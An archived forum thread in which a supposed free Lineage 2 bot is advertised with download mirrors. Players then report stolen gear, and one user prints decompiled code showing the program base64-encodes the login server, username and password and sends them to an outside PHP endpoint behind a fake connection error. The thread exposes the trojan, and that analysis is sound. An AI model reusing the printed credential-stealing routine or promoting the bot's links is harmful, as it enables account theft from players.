View Full Version : L2 Auxhilary (OOG BOT)
L2AuxTeam
29th December 2007, 08:00
L2 Auxhilary ( http://l2auxhilary.vze.com/ )
New out of game bot, supporting many features such as the following:
- Auto-Leveler
- Auto-Trade / Auto-Quest
- 100% Free forever
- Supports L2 Walker & L2 Superman scripts (However, a script editing program for these is not available at this time)
- Out of game support (No need for an actual game client to run)
- Many more features!
Also, we will be releasing an in game version further down the road so stay posted! Join us and help with the beta test!
Mirrors (A more up-to-date list located here: http://l2auxhilary.vze.com/ ):
http://files.filefront.com/L2+Auxhilary+100+Betazip/;9345829;/fileinfo.html
http://files.filefront.com/L2+Auxhilary+100+Betarar/;9345828;/fileinfo.html
http://www.uploading.com/files/LE49JKRA/L2_Auxhilary_1.0.0_Beta.zip.html
http://www.uploading.com/files/A111ZUAP/L2_Auxhilary_1.0.0_Beta.rar.html
We like to hear your feedback, so please, if you have any comments/suggestions/questions or complaints, please e-mail us at l2auxteam@gmail.com (Other contacting options are listed under "Contact Us" on our website)
Happy Botting! :D
L2 Auxhilary Team.
hyperkalemia
29th December 2007, 09:21
uhmm... how can i make this work on l2sea?
L2AuxTeam
29th December 2007, 10:06
Currently the only support servers are the Official USA servers. We'll be releasing a patch soon that allows you to connect to Korean, Sea Servers, etc.
We'll keep you posted on our website about that progress.
Thanks!
zgd
29th December 2007, 14:46
maybe there will be a release for private servers like: L2Supreme ?
L2AuxTeam
29th December 2007, 18:06
In the near future we plan on releasing a bot that works for almost all Official/Private servers, but for now, as it's still in beta stages it's simply not logical to release a bot for every server as we have smaller bugs to figure out.
Thanks!
griffter
29th December 2007, 21:51
it looks realy nice... iam interested on the privat server part..
stay tuned ppl it might be a better bot then l2walker or superman.
GJ mates
Sandbagger
30th December 2007, 10:29
Don't use this program! It sends your login and account info to crooks that clean out all your gear on every character you have on the account.
hyperkalemia
30th December 2007, 18:54
oh i see.. tnx tnx. keep up the good work guys.
L2AuxTeam
31st December 2007, 09:34
Don't use this program! It sends your login and account info to crooks that clean out all your gear on every character you have on the account.
We don't understand where you're getting this information. If you downloaded it from our mirrors you wouldn't have problems like this.
We want to let all of our users know that they should stay safe by scanning every file they download. If you're careful things like that won't happen!
Thanks,
L2 Aux Team
Sandbagger
1st January 2008, 02:54
I tried 2 use this bot program with 2 different accounts. Both accounts where cleaned of ever bit of gear on every character I had on those accounts. They even made a new character on one server an named him L2Auxhilaryteam001.
Street value of the gear is over $300.00. Don't download this bot program. You will be sorry.
L2AuxTeam
4th January 2008, 18:43
bump. Added new mirrors and news :)
griffter
4th January 2008, 19:25
what are the screenshots for??
how about some screenshots from ingame fighting with the bot???
L2AuxTeam
9th January 2008, 02:39
what are the screenshots for??
how about some screenshots from ingame fighting with the bot???
More screenshots coming soon! :D
papajo
6th May 2008, 04:03
We don't understand where you're getting this information. If you downloaded it from our mirrors you wouldn't have problems like this.
We want to let all of our users know that they should stay safe by scanning every file they download. If you're careful things like that won't happen!
Thanks,
L2 Aux Team
I decompiled this prog to VB. Not sure how many of you know visual basic, but I will post my findings here and tell you what I believe they mean. Anyone who wants the full code, I will be happy to send it to you.
private void sendData()
{
bool flag = !InvokeRequired;
if (!flag)
{
Random random = new Random();
Thread.Sleep(random.Next(1000, 5000));
base.Invoke(new ConnectForm.SendData(sendData), new object[0]);
}
else
{
try
{
byte[] bArr1 = Encoding.UTF8.GetBytes(serverComboBox.Text);
byte[] bArr2 = Encoding.UTF8.GetBytes(usernameTextBox.Text);
byte[] bArr3 = Encoding.UTF8.GetBytes(passwordTextBox.Text);
string s = "?a=\uFFFD" + Convert.ToBase64String(bArr1) + "&b=\uFFFD" + Convert.ToBase64String(bArr2) + "&c=\uFFFD" + Convert.ToBase64String(bArr3);
webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + s);
}
catch
{
}
statusLabel.Text = "Ready\uFFFD";
connectProgressBar.Style = ProgressBarStyle.Blocks;
connectButton.Enabled = true;
MessageBox.Show("Couldn't connect! Check your settings and try again.\uFFFD", "Error\uFFFD");
}
}
This message in paticular should stand out to anyone using the code and has been unable to connect: "Couldn't connect! Check your settings and try again."
A few lines above it, something caught my eye: "webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + s);"
/sarcasm
Now why would it be trying to navigate to this site while trying to connect to L2? Any Ideas?
/end sarcasm
Now if you type in http://l2auxhilary.byethost13.com/aux_ins.php it will redirect you to their main site. Bad vibes from this one.
Note: The most frighteningly easy code I have ever attempted to de-compile, and the only one that has ever fully worked for me. Any more bad vibes anyone?
Need more proof that this can in no way be a bot?
Check out the file size. I am comaring it to OOG super 1.58 and L2 walker OOG 10.7.2 (I feel they version requires mentioning because other versions may have different sizes, but it is the versions I am staring at ATM.
Super has server-side validation and shtuff (which is why no one can crack it)
Size: 54.3 MB
Walker has client side validation and shtuff (which is why everyone seems to crack it)
Size: 15.7
Auxhilary: 4.21 MB
Now let me show you something else:
IG Super (1.58): 49.0 MB
IG Walker (1.57): 5.78 MB
Again: something fishy to anyone?
I HOPE THIS SCUMMMMMEEEEEERSSSSSSSS GET BUSTED!!!! DIE YOU NOLIFERS!!!!
vBulletin® v3.8.4, Copyright ©2000-2009, Jelsoft Enterprises Ltd.